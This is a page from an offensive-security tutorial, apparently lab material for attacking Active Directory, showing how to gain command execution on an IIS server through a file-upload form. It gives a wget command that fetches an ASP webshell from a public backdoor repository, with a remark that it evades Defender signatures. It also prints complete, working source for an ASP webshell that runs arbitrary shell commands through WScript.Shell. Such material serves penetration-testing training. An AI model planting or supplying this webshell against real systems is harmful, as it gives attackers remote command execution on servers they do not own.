> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/exploiting-iis-and-privilege-escalation/iis-webshell.md).

# IIS - webshell

* There is a simple asp.net application on <http://192.168.56.22/>, this application only give us a simple file upload functionality.

<figure><img src="/files/nSJXbFbZcFxbtI3lLsPz" alt=""><figcaption></figcaption></figure>

* From there we can upload a basic aspcmd in asp : aspcmd.asp (at the time of writing, this avoid defender signature)

### aspcmd.asp

```
wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/asp/aspcmd.asp
```

### cmd.asp

```
<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>
```

<br>

* The webshell is uploaded in the upload folder.
* And we have a command execution on the IIS server<br>

<br>
